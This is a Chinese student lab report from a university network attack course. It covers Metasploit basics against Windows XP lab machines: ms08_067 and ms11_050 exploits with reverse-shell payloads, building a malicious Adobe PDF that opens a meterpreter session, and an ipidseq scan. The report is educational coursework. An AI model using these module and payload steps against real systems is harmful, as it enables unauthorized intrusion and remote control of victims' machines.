• 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用


    《网络对抗技术》Exp5 MSF基础应用

    1. 一个主动攻击实践(ms08_067)
    2. 一个针对浏览器的攻击(ms11_050)
    3. 一个针对客户端的攻击(adobe_toolbutton)
    4. 成功应用任何一个辅助模块(ipidseq)(唯一)

    实验目的

    掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路

    返回目录


    实验环境:

    • 靶机1:Windows XP Professional SP2 
    • 靶机2:Windows XP vivian SP3 简体中文

    基础问题:

    用自己的话解释什么是 exploit , payload , encode 。

    1. exploit:利用漏洞,达到攻击控制受害机的一种手段。
    2. payload:载荷,含有执行攻击的代码,攻击者进行攻击的“武器”。
    3. encode:对攻击代码进行伪装,使得shellcode改变形状。使其能正常运行并尽量免杀。

    返回目录


     

    1、主动攻击:ms08_067

    • 使用靶机1和Kali
    • msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块

    • 用show targets查看可以被攻击的靶机的操作系统型号:

    • 用show payloads查看可以供我们使用的攻击载荷:

    • 从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:

    • 用show options查看需要设置的参数

    • 设置RHOST(靶机IP)和LHOST(Kali的IP):

    • 设置target选项目标(我攻击的系统为WIN xp 中文简体 SP2,所以选择9)

    • 确认参数设置无误后,用exploit指令开始攻击:

    • 攻击成功后会获取靶机的shell,可以对其进行操作:

    返回目录


    2、针对浏览器的攻击:ms11_050

    • 使用靶机2和Kali:用search ms11_050查询一下针对该漏洞的攻击模块,并用use windows/browser/ms11_050_mshtml_cobjectelement使用该模块:
    • 用info查看该模块的信息(这个指令相当于show targets、show options等的集合版):

    • 用set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。

    用show options确认需要设置的参数是否已经设置好。

    • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

    • 在靶机IE上输入该网址

    • kali中显示session 1已经创建,并显示其会话ID

    然而实验2还是失败了 XP系统的IE浏览器已经崩掉了

    返回目录


    3、针对客户端的攻击:adobe_toolbutton

    • 使用靶机2和Kali:用search adobe查询一下针对该漏洞的攻击模块:

    • 选择一个模块并使用该模块:

    • 用show targets查看可以被攻击的靶机的操作系统型号

    • 设置payload攻击载荷,命令set payload windows/meterpreter/reverse_tcp

    • 用show options查看需要设置的参数:

    • 设置相应参数,实施exploit攻击,发现在/root/.msf4/local/目录下成功生成了一个gapziyun.pdf文件:

    • 如果在kali中找不到这个pdf文件,那么打开文件夹的隐藏文件显示就可以找到

    • 将pdf文件粘贴到靶机win xp

    • 在kali中打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口

    • 在靶机上打开刚刚那个pdf文件可以观察到Kali成功获取了靶机的shell,可以对其进行操作:

    返回目录


     4、成功应用任何一个辅助模块:ipidseq

    • ipidseq
      功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。
    • 用show auxiliary查看所有辅助模块,并选择其中的一个,选的是scanner/ip/ipidseq:

    • 查看需要设置的参数,设置完成后确认一下,这里可以进行对单一目标主机的扫描,然后就可以开始exploit了。

    • 也可以对指定网段的主机进行扫描:

    返回目录


    实验中遇到的问题

     第二个任务的时候网页一直崩溃,尝试了如下的方法解决:

    1.将其加入信任站点(失败

    2.对Internet进行重新设置。将杀毒防御功能关闭(无效)

     总结一下:可能是攻击程序太经典了。IE已经能检测到此漏洞

    返回目录


    实验总结与体会 

    1.通过这次实验基本掌握了msf渗透攻击的“套路”,search 查看漏洞信息,show targets 查看可以攻击的系统,show payloads 选择合适的载荷 ,show options 查看需要修改那些属性,info查看各种详细信息,最后反弹链接shell,只要找到合适的靶机,合适的版本,按流程下来基本都可以解决。

     2.实验过程中,失败很多次,其实心态差点爆炸,但是仔细一想网络攻防失败是正常的。静下心来完成了之前剩下的实验。整个实验做完了,感受的是网络攻防过程,而不是那个结果。

    返回目录

  • 相关阅读:
    七天冲刺04
    软件工程概论项目——典型用户场景分析
    七天冲刺3
    七天冲刺2
    七天冲刺1
    第十三周总结
    软件工程概论个人作业02
    第二周学习进度
    软件工程个人作业01--四则运算
    连接数据库的javaee编译简易的WEB登陆界面
  • 原文地址:https://www.cnblogs.com/fakerli/p/10714800.html
Copyright © 2020-2023  润新知